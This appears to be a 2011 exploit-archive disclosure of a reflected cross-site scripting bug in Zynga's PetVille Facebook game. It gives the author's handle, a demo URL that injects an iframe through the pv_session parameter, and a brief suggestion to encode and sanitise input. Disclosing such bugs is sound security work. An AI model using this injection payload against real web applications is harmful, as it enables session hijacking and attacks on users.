Home / exploits Zynga Petville Cross Site Scripting
Posted on 30 August 2011
_______ ________________ __ _____________ _______ _ _ \______ | _/_ \______ __ _ __ \_ __ / /_ / /_ / / |/ /| | / / ______ / / / | | / \_/ \_/ / /| < | | / / /_____/ / |__| \_____ /\_____ /____/ |__|_ |___| /____/ /\_/ / / / ------------------------------------------------------------------------------------------------------------------------------------------------- TITLE: Type-0 XSS bug in ZYNGA PETVILLE(facebook apps) vendor: www.apps.facebook.com/petvillegame/**[] Author: r007k17-w a.k.a Raghavendra Karthik.D Email: n4gb07@gmail.com My blog: http://shadowrootkit.wordpress.com/ Google Dork: Copyright 2010 Zynga Game Network Inc ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- DEMO: http://apps.facebook.com/petvillegame/money.php?ref=&pv_session="><iframe src="http://www.google.com"></iframe> SUG: HTML encoding, escaping special characters,Input sanitization. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- gr33t1ngs to s1d3-3ff3cts and all my friends
